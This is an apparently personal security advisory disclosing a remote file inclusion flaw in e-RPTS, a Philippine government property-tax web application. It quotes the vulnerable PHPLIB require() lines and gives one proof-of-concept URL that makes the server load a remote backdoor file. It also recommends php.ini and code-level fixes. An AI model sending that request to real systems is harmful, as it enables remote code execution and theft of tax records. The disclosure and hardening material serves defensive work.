e-RPTS RFI Vulnerability
2/12/2010 05:21:00 PM
Posted by johnhomer
About E-RPTS
(from the website)
An Open Source solution for Real Property Taxation in the Philippines
Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).
eRPTS is a web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allow LGUs to improve their monitoring of compliance and revenue generation.
This is a critical vulnerability since the software is being implemented in each of the Philippine government's Local Government Units and could expose sensitive data such as tax records and other business-related details.
The vulnerability
in the file:
/includes/web/prepend.php
line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");
This code is vulnerable to Remote File Inclusion (RFI): the $_PHPLIB["libdir"] prefix used by every require() is never set from a trusted source before these lines run, so it can be supplied in the request and point to a remote file, e.g.
http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?
For this vulnerability to work, register_globals must be set to on (so the request parameter becomes the global $_PHPLIB array) and allow_url_fopen must be set to on (so require() will fetch the remote URL).
Recommendations
You should disable allow_url_fopen in the php.ini file:
allow_url_fopen = Off
The setting can also be disabled in Apache's httpd.conf file:
php_flag allow_url_fopen off
This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.
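As an added illustration (not e-RPTS or PHPLIB code), the following hardened head for includes/web/prepend.php shows the code-level fix that complements the php.ini change: the library path is assigned unconditionally, overwriting anything register_globals may have injected, and is rejected if it is a URL or not a real local directory. The install path /usr/local/lib/phplib/ and the helper name erpts_check_libdir are assumptions.

```php
<?php
// Added example, not the project's own code.
// With register_globals=On, PHP creates a global $_PHPLIB array from the request
// (?_PHPLIB[libdir]=http://...) before this file runs; the original prepend.php
// then passes that value straight into require(). Never trust a pre-existing
// $_PHPLIB: overwrite it with the configured path and validate that path.

// 1. Unconditionally replace anything the request may have injected.
$_PHPLIB = array();
$_PHPLIB["libdir"] = "/usr/local/lib/phplib/";   // assumed install path

// 2. Defence in depth: the library directory must be a real local directory,
//    never a stream wrapper such as http://, ftp:// or php://.
function erpts_check_libdir($dir)
{
    // Any "scheme://" prefix means a remote or wrapper path: reject it.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $dir)) {
        return false;
    }
    $real = realpath($dir);
    if ($real === false || !is_dir($real)) {
        return false;
    }
    // Must be absolute and must actually contain the PHPLIB entry file we expect.
    return $real[0] === '/' && is_file($real . '/common.inc');
}

if (!erpts_check_libdir($_PHPLIB["libdir"])) {
    // Fail closed: do not fall back to a request-supplied or relative path.
    header('HTTP/1.0 500 Internal Server Error');
    die('PHPLIB library directory is misconfigured.');
}

// 3. Normalise to a canonical directory with a trailing slash, then load the
//    library with the same file list as the original prepend.php.
$_PHPLIB["libdir"] = rtrim(realpath($_PHPLIB["libdir"]), '/') . '/';
require($_PHPLIB["libdir"] . "common.inc");
require($_PHPLIB["libdir"] . "constants.php");
require($_PHPLIB["libdir"] . "setup.inc");
require($_PHPLIB["libdir"] . "session.inc");
require($_PHPLIB["libdir"] . "auth.inc");
require($_PHPLIB["libdir"] . "perm.inc");
require($_PHPLIB["libdir"] . "db_mysql.inc");
require($_PHPLIB["libdir"] . "tr_rpts.inc");
require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
require($_PHPLIB["libdir"] . "page.inc");
require($_PHPLIB["libdir"] . "template.inc");
```

Keep allow_url_fopen off as recommended above even with this change; the code fix removes the injection point, the ini setting removes the remote fetch, and neither alone should be relied on.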
__________________
Bug Discovered by:
John Homer Alvero
__________________
References:
This entry was posted on October 4, 2009 at 12:14 pm.